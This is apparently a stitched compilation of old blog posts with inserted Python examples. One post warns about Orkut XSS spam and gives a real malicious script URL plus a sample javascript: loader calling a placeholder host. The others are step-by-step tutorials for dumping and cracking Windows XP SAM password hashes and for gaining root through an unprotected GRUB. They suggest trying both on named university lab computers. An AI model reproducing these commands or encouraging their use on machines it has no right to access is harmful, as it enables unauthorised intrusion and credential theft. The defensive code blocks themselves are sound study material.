Orkut: Beware of Spammers and Click safely

Orkut, Google's answer to MySpace and Facebook in the social networking arena, has recently got me really, really frustrated. Orkut is a popular social network among Brazilians and Indians, who account for more than 80% of the site's traffic.
Coming from a company like Google, one would expect high standards of security and privacy controls, but the recent exploits are sadly discouraging.

Orkut is overflowing with spam and XSS attacks. They arrive as friendly-looking scraps that ask you to click on some link or paste some code into your browser's address bar to see something cool. Doing so runs a piece of JavaScript that gets access to your contacts and private data, and the rest is left to the attacker's creativity. One recent spam I received was like this:

Now, if you receive this from a really good friend, you would be excited to know which girl he is referring to. So I clicked to see her profile. On her profile, she mentions this mystery friend of hers and asks you to copy and run a piece of code to see his (her friend's) profile.

If you are smart, you would have guessed that it's just another XSS attack. If you are smarter, you would paste this into your address bar and look for the location of the JavaScript. This is what I found: http://coolpics99.110mb.com/gudfoto5.js

Open this JavaScript file in a text editor and you will figure out what the script really does.

For those interested: this script scraps all your friends with the exact message that you received. Sometimes it amuses me how people have so much spare time to do such creative stuff, and people like me have to write about them. But in retrospect, it's dangerous and I hope Google does something to fix this. There can be far-reaching implications like identity and credit card theft. My suggestion: view the source/link of anything that you click on, or you might regret that click all your life. Play safe and click safe :)
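The advice above is to look at what a scrap asks you to paste before running it. As an added example (not code from the original post), here is a small Python checker that inspects such a "paste this into your address bar" snippet statically: it extracts the remote script URLs, flags hosts that are not the site's own, and gives a verdict without ever executing the JavaScript. The trusted host list, the loader hints and the sample lure (with a placeholder host) are assumptions for the demo.

```python
import re
from urllib.parse import urlparse

# Assumption for this example: only these hosts count as first-party Orkut.
TRUSTED_HOSTS = {"orkut.com", "www.orkut.com"}
JS_URI = re.compile(r"^\s*javascript\s*:", re.IGNORECASE)
URL_LITERAL = re.compile(r"""['"](https?://[^'"\s]+)['"]""", re.IGNORECASE)
# Fragments typical of a loader that pulls a second-stage script from elsewhere.
LOADER_HINTS = ("createElement", ".src", "appendChild", "XMLHttpRequest", "eval(")

def analyse_lure(snippet: str) -> dict:
    """Statically inspect text a scrap asks you to paste, without running it.

    Reports the remote script URLs it references and which hosts are foreign
    to the site, so the file can be read in a text editor instead of executed.
    """
    is_js_uri = bool(JS_URI.match(snippet))
    urls = URL_LITERAL.findall(snippet)
    foreign = sorted({urlparse(u).hostname for u in urls
                      if urlparse(u).hostname not in TRUSTED_HOSTS})
    hints = [h for h in LOADER_HINTS if h in snippet]
    if is_js_uri and foreign:
        verdict = "remote script loader from foreign host: do not paste"
    elif is_js_uri and hints:
        verdict = "inline script with loader behaviour: inspect before use"
    elif is_js_uri:
        verdict = "javascript: URI: treat with suspicion"
    else:
        verdict = "not a javascript: URI"
    return {"is_javascript_uri": is_js_uri, "remote_scripts": urls,
            "foreign_hosts": foreign, "loader_hints": hints, "verdict": verdict}

# Constructed sample in the shape the post describes; the host is a placeholder.
SAMPLE_LURE = ("javascript:void(s=document.createElement('script'));"
               "void(s.src='http://coolpics.example.invalid/gudfoto5.js');"
               "void(document.body.appendChild(s))")

if __name__ == "__main__":
    for key, value in analyse_lure(SAMPLE_LURE).items():
        print(f"{key}: {value}")
```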

Here is an interesting community that teaches and practises such exploits and bugs on Orkut: Bugs on Orkut

Hacking/Recovering Windows XP passwords

Please note: this article is for educational purposes only.

Goal: to recover Windows XP account passwords when you obviously don't have admin privileges.

Prerequisites (either one):
1. You can boot from a CD (in many places CD boot is disabled in the BIOS).
2. Another OS, XP or Linux, is also installed, and you have access to it.

Tools needed: Ophcrack Live CD, rainbow tables

Let's start.

How does it work?

Generally, XP account passwords are stored as hashes in the encrypted SAM file, located at c:\windows\system32\config\SAM.
The process requires you to get a hash dump of this SAM file and pass it to Ophcrack, which will then use this beautiful method involving rainbow tables to recover the password for you. Rainbow tables are much faster than the usual dictionary and brute-force methods.
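To show why a store of unsalted password hashes falls to this kind of precomputation, here is an added toy rainbow table in Python (not code from the original post or from Ophcrack). It works over a 3-letter lowercase password space hashed with SHA-1: a few hundred (endpoint, start) chain pairs stand in for the full table of 17,576 hashes, and the lookup trades extra hashing for the memory saved. The hash function, alphabet, chain length and chain count are assumptions chosen for the demo.

```python
import hashlib
import random
import string

# Toy setting: 3 lowercase letters (17,576 candidates) hashed with unsalted SHA-1.
ALPHABET, PW_LEN = string.ascii_lowercase, 3
SPACE = len(ALPHABET) ** PW_LEN
CHAIN_LEN = 40    # hashes per chain: lookup work grows with this
NUM_CHAINS = 400  # (endpoint -> start) pairs stored instead of 17,576 hashes

def hash_pw(pw: str) -> bytes:
    return hashlib.sha1(pw.encode()).digest()

def index_to_pw(idx: int) -> str:
    n = len(ALPHABET)  # base-n digits of idx, one per character
    return "".join(ALPHABET[idx // n ** i % n] for i in range(PW_LEN))

def reduce_hash(h: bytes, column: int) -> str:
    # Map a hash back into password space; using a different map per column
    # keeps chains that collide in one column from merging for good.
    return index_to_pw((int.from_bytes(h[:8], "big") + column) % SPACE)

def build_table(seed: int = 1) -> dict:
    """Precompute the chains; only each chain's endpoint -> start is kept."""
    rng = random.Random(seed)
    table = {}
    for _ in range(NUM_CHAINS):
        start = pw = index_to_pw(rng.randrange(SPACE))
        for column in range(CHAIN_LEN):
            pw = reduce_hash(hash_pw(pw), column)
        table.setdefault(pw, start)
    return table

def lookup(table: dict, target: bytes):
    """Return a preimage of target if it lies in any stored chain, else None."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_hash(target, column)  # assume target sits in this column
        for later in range(column + 1, CHAIN_LEN):
            pw = reduce_hash(hash_pw(pw), later)
        start = table.get(pw)
        if start is None:
            continue
        cand = start  # endpoint matched: regenerate the chain and find the hash
        for col in range(CHAIN_LEN):
            if hash_pw(cand) == target:
                return cand
            cand = reduce_hash(hash_pw(cand), col)
    return None
```

Adding a per-user salt to the hash input is what breaks this: every salt value would need its own table.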

1. If the BIOS allows you to boot from a CD, you are in luck. Burn the Ophcrack Live CD and it will take care of the rest. Simply specify which XP instance you want to recover the password for.
It will automatically get a hash dump and start recovering the password.

2. The alternate way, the one I describe here in detail, is to use your other OS. Say you already have Linux as the second OS. Get access to it either using your legitimate account or using the "Hacking Linux root accounts via grub" article.

a) Download Ophcrack from the website.

b) Download a rainbow table depending on your RAM.

c) Copy the SAM and SYSTEM files from the following location (assuming you know how to mount NTFS partitions):

cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SAM ./

cp /mnt/win_C/WINDOWS/SYSTEM32/Config/SYSTEM ./

where /mnt/win_C is where your Windows NTFS partition is mounted and the current folder is the OphCrack/linux tools/ folder.

d) Run the bkhive and samdump2 tools:

bkhive SYSTEM temp.txt

samdump2 SAM temp.txt > hashes.txt

Both of these are available in your OphCrack/linux tools folder.

e) Run Ophcrack. Load the rainbow table and the hashes.txt file, and wait.
The time this takes depends on the strength of the stored password.

Great! You have recovered your account password.
Note: you can selectively extract only "your" account password, if you do have one ;)
Now log in using the recovered username/password and check.

Places to experiment: SOC 1 level 8 PC labs (NUS)

Caution: it is a criminal offence if you don't have the right to access the system. Also, accounts authenticated via LDAP cannot be recovered this way. There is generally a debugger account which gives you some admin rights to add and remove users on the PC.

Hacking Linux root accounts via grub

This is a very common and popular way to reset the root password if GRUB is not password-protected by the system administrator.

Places you can try: SOC level 8 PC labs. They recently installed FC6 but forgot to protect GRUB ;)

Note: with great power comes great responsibility. Use the root account with caution.

1. Switch on the PC and press a key to bypass the default OS boot.
2. The GRUB menu will show up.
3. Highlight the entry that displays the selected Linux distro and type e.
4. This takes you to edit mode. Highlight the second entry (leave the rescue entry alone) and add single at the end of the boot entry.

5. Once you have done that, enter b.
6. Your installed Linux distro will reboot and take you to init 1, i.e. single-user (admin) mode.

7. To add a new user, type
adduser guest

where guest is the name of the new user you want to add.

8. To reset your own or any other user's password:
passwd <user>

The above is a great way to reset your password in case you forgot it, or to get access to a Linux PC if GRUB is not protected.
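The whole procedure above hinges on GRUB not being password-protected. As an added example (not from the original post or from the GRUB project), here is a Python audit that reads a GRUB Legacy menu.lst or a GRUB 2 grub.cfg and reports whether editing entries at the console requires a password, alongside a constructed FC6-style menu.lst in both the unprotected and the protected form. The sample file contents, kernel paths and the password hash are placeholders assumed for the demo.

```python
import re

# Constructed sample of a Fedora Core 6-era GRUB Legacy menu.lst with no
# password line, i.e. the state the post describes (paths are placeholders).
UNPROTECTED_MENU_LST = """\
default=0
timeout=5
hiddenmenu
title Fedora Core (placeholder kernel)
        root (hd0,0)
        kernel /vmlinuz-placeholder ro root=/dev/VolGroup00/LogVol00 rhgb quiet
        initrd /initrd-placeholder.img
"""

# Same file with the mitigation: a global MD5 password in the section before
# the first "title", so the "e" (edit) and "c" (console) keys only work after
# pressing "p" and authenticating. The hash is a placeholder; a real one comes
# from grub-md5-crypt.
PROTECTED_MENU_LST = UNPROTECTED_MENU_LST.replace(
    "hiddenmenu\n", "hiddenmenu\npassword --md5 $1$PLACEHOLDER$hashfromgrubmd5crypt\n")

def audit_grub_config(text: str) -> list:
    """Return findings for a GRUB Legacy menu.lst or a GRUB 2 grub.cfg."""
    findings = []
    if re.search(r"^\s*title\s", text, re.M):  # GRUB Legacy
        global_section = re.split(r"^\s*title\s", text, maxsplit=1, flags=re.M)[0]
        pw = re.search(r"^\s*password\s+(\S+)", global_section, re.M)
        if not pw:
            findings.append("no global password: anyone at the console can edit "
                            "an entry and append 'single' to the kernel line")
        elif pw.group(1) != "--md5":
            findings.append("password is stored in cleartext; use "
                            "'password --md5 <hash>' generated by grub-md5-crypt")
    elif re.search(r"^\s*menuentry\s", text, re.M):  # GRUB 2
        superusers = re.search(r"^\s*set\s+superusers=", text, re.M)
        any_pw = re.search(r"^\s*(password|password_pbkdf2)\s", text, re.M)
        pbkdf2 = re.search(r"^\s*password_pbkdf2\s+\S+\s+grub\.pbkdf2\.", text, re.M)
        if not (superusers and any_pw):
            findings.append("GRUB 2: 'set superusers=' plus a password_pbkdf2 line "
                            "are needed before editing entries requires a password")
        elif not pbkdf2:
            findings.append("GRUB 2: password is cleartext; use password_pbkdf2 "
                            "with a hash from grub-mkpasswd-pbkdf2")
    else:
        findings.append("unrecognised GRUB configuration format")
    return findings
```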